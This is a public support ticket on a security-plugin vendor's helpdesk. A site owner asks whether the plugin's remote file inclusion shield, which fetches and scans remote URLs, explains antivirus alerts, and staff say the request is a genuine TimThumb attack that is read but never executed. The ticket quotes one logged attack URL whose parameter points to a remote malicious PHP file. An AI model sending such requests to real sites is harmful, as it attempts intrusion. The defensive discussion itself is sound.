Support

Admin Tools

#16468 Remote File Inclusion block (RFIShield) Settings

Posted in ‘Admin Tools for Joomla! 4 & 5’
This is a public ticket

Everybody will be able to see its contents. Do not include usernames, passwords or any other sensitive information.

Environment Information

Joomla! version
n/a
PHP version
n/a
Admin Tools version
n/a

Latest post by nicholas on Wednesday, 19 June 2013 11:12 CDT

user23842
Mandatory information about my setup:

Have I read the related troubleshooter articles above before posting (which pages?)? Yes
Have I searched the tickets before posting? Yes
Have I read the documentation before posting (which pages?)? Yes
Joomla! version: 2.5.11
PHP version:
MySQL version: (unknown)
Host: (optional, but it helps us help you)
Admin Tools version: 2.4.4

Description of my issue:

We have been getting RFI attacks where the URL's looked like this:

http://www.ourwebsite.com/wp-content/themes/couponpress/thumbs/_tbs.php?src=http://picasa.com.civicimobiliare.ro/bad.php

Admin tools has been catching these and logging them, but also the antivirus on the server has been catching these which is making me a little nervous. When I looked at the description of the RFI functionality it says:

Remote File Inclusion block (RFIShield)
Some hackers will try to force a vulnerable extension into loading PHP code directly from their server. This is done by passing an http(s):// or ftp:// URL in their request, pointing to their malicious site. When this option is enabled, Admin Tools will look for such cases, try to fetch the remote URL and scan its contents. If it is found to contain PHP code, it will block the request.

My question is, when admin tools is fetching the remote URL to scan the contents, is that what the antivirus is picking up? Is it a false positive result? If we did not have antivirus running, would it have infected the site? Is there a way to just block requests like this instead of trying to fetch and scan the contents?

Thanks!

tampe125
Akeeba Staff
Hi Rob,

fetch is a generic term, there is a big difference between reading and executing.
When docs says "fetch the remote URL", it means that Admin Tools tries to read the content in memory and, if a php tag is found, it blocks everything.
Most likely your hosting antivirus is doing something similar; so no infection is done (since the code isn't included nor executed), simply we're doing the same check :)

Davide Tampellini

Developer and Support Staff

🇮🇹Italian: native 🇬🇧English: good • 🕐 My time zone is Europe / Rome (UTC +1)
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!

nicholas
Akeeba Staff
Manager
More background information: The URL you posted is a WordPress URL, part of an attack against an outdated version of TimThumb that caused a series of thousands of compromised sites years ago. If you take a look at the remotely included file (which is NOT hosted on Picasa, despite the largely misleading URL) it is a full blown malicious PHP script. Admin Tools correctly blocks it. In fact, Admin Tools will block any remote file inclusion that contains PHP code (as Davide explained), exactly for cases like this.

So, in conclusion: this is not a false positive. It is a genuinely malicious request, even though it wouldn't have any effect on your site. Admin Tools should, and does, block it. There is a way to block these requests and that is Admin Tools :) So, basically, you just verified that Admin Tools does what it's supposed to do, very efficiently.

If you want to completely block such URLs, yes you can. With Admin Tools' .htaccess Maker and the option to block remote file inclusions.

Nicholas K. Dionysopoulos

Lead Developer and Director

🇬🇷Greek: native 🇬🇧English: excellent 🇫🇷French: basic • 🕐 My time zone is Europe / Athens
Please keep in mind my timezone and cultural differences when reading my replies. Thank you!

Support Information

Working hours: We are open Monday to Friday, 9am to 7pm Cyprus timezone (EET / EEST). Support is provided by the same developers writing the software, all of which live in Europe. You can still file tickets outside of our working hours, but we cannot respond to them until we're back at the office.

Support policy: We would like to kindly inform you that when using our support you have already agreed to the Support Policy which is part of our Terms of Service. Thank you for your understanding and for helping us help you!